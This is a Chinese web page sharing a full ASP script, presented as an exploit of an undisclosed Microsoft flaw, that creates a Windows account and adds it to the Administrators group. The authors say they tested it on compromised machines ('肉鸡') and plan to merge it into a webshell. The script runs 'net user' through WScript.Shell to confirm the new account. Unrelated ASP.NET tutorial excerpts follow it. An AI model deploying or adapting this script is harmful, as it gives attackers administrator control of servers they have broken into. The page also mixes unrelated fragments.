添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]_应用技巧

添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文 文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。 

复制代码 代码如下:

<head>.network对象脚本权限提升漏洞利用工具</head> 
<form action="useradd.asp" method=post> 
用户:<input name="username" type="text" value="kevin1986"><br> 
密码:<input name="passwd" type="password"><br> 
<input type="submit" Value="添 加"> 
</form> 

<%@codepage=936 
on error resume next 
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then 
response.write "iP !s n0T RiGHt" 
else 
if request("username")<>"" then 
username=request("username") 
passwd=request("passwd") 
Response.Expires=0 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user",username) 
od.SetPassword passwd 
od.SetInfo 
oe.Add oz&"/"&username 
if err then 
response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……" 
else 
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then 
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧" 
else 
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了" 
end if 
end if 
else 
response.write "请输入输入用户名" 
end if 
end if 
%> 

时间: 2024-09-28 14:59:45

添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]_应用技巧的相关文章

ASP代码实现自动清除替换ACCESS(MDB)数据库的日文字符的_应用技巧

此时我们通常能想到的想法是找一个exe程序,把这个问题解决掉.我原来用C#写过这样一个类似的程序. Google里面应该能找到我以前写的那个.就不说了. 后来某一天,我发现ASP就能实现.我当时真的觉得自己太屎了. 不过ASP的这种方法很不好.容易造成系统崩溃(如果数据库大). 所以只是写在这里.算是抛砖引玉. '下面我解释一下下: Function TransferJapanDc9CnInDB()   On Error Resume Next   Err.Clear   Dim objRS,i

灵活掌握asp.net中gridview控件的多种使用方法(下)_实用技巧

继续上篇文章的学习<灵活掌握asp.net中gridview控件的多种使用方法(上)>,在此基础上巩固gridview控件的操作使用,更上一层楼. 11.GridView实现用"..."代替超长字符串:效果图:   解决方法:数据绑定后过滤每一行即可 for (int i = 0; i <= GridView1.Rows.Count - 1; i++) { DataRowView mydrv; string gIntro; if (GridView1.PageInde

灵活掌握asp.net中gridview控件的多种使用方法(上)_实用技巧

灵活使用asp.net中gridview控件的方法有很多种,本文内容很富,希望大家都能有所收获. 1.GridView无代码分页排序: 效果图: 小提示: 1.AllowSorting设为True,aspx代码中是AllowSorting="True": 2.默认1页10条,如果要修改每页条数,修改PageSize即可,在aspx代码中是PageSize="12". 3.默认的是单向排序的,右击GridView弹出"属性",选择AllowSort

Asp.net程序优化js、css实现合并与压缩的方法_实用技巧

本文实例讲述了Asp.net程序优化js.css实现合并与压缩的方法.分享给大家供大家参考.具体实现方法如下: 访问时将js和css压缩并且缓存在客户端, 采用的是Yahoo.Yui.Compressor组件来完成的,用户可以点击此处本站下载. 创建一个IHttpHandler来处理文件 复制代码 代码如下: public class CombineFiles : IHttpHandler {         private const string CacheKeyFormat = "_Cac

ASP.NET小结之MVC, MVP, MVVM比较以及区别(二)_实用技巧

上一篇得到大家的关注,非常感谢.由于自己对于这些模式的理解也是有限,对于这些模式的比较,是结合自己的理解,一些地方不一定准确,但是只有亮出自己的观点,才能抛砖引玉不是? 欢迎各位拍砖.:) 复制代码 代码如下: 阅读目录: 四. MVP模式      4.1 MVP的思想      4.2 UI界面接口化      4.3 Presenter -- Model和View之间的桥梁      4.4 MVP的代码结构和时序图      4.5 MVP模式总结 五. MVVM模式      5.1

asp.net下gridview 批量删除的实现方法第1/3页_实用技巧

要实现的效果很简单,看下图片: 功能:选中CheckBox,后从数据库中删除选中项.文章侧重将如何实现批量删除,对于如何链接数据库和绑定数据不做详细解释. 1 我们先要在GridView中添加一列为CheckBox.代码如下: 复制代码 代码如下: <asp:GridView ID="GridView1" runat="server" AutoGenerateColumns="false">  <Columns>     

ASP.NET汉字转拼音 - 输入汉字获取其拼音的具体实现_实用技巧

前不久看到有的朋友实现对商品名称拼音的录入,发现他的实现方式是手动输入的,-_-#.同志们,福利来了! 微软为了开发者实现国际化语言的互转,提供了Microsoft Visual Studio International Pack,这个扩展包里面有中文.日文.韩文.英语等各国语言包,并提供方法实现互转.获取拼音.获取字数.甚至获取笔画数等等. 在这里示例讲的是输入汉字,获取其拼音,获取拼音和获取拼音首字母实现效果分别如下: 首先,去微软官网下载Microsoft Visual Studio In

asp 防盗链代码(彻底屏蔽迅雷,旋风,快车下载站内资源)_应用技巧

复制代码 代码如下: <% '屏蔽主流的下载工具 Dimxurl,xtool '获取浏览器AGENT xurl=lcase(Request.ServerVariables("HTTP_USER_AGENT")) '定义禁止的AGENT,下面5个包含最新版的快车,旋风和迅雷部分版本,可以自行添加! xtool="mozilla/4.0(compatible;msie5.00;windows98)"&_ "mozilla/4.0(compatib

asp统计信息实现代码/文章每日、每周、每月、总访问量的方法_应用技巧

复制代码 代码如下: <% '//hittime 日期型:获得上次访问时间 '//hits 数字型:获得总浏览量 '//hitsday 数字型:获得今天浏览量 '//hitsweeks 数字型:获得本周浏览量 '//hitmonths 数字型:获得本月浏览量 '数据库中 添加这5个字段. set rs1=server.CreateObject("adodb.recordset") rs1.open "select * from qwbmnewssss where id=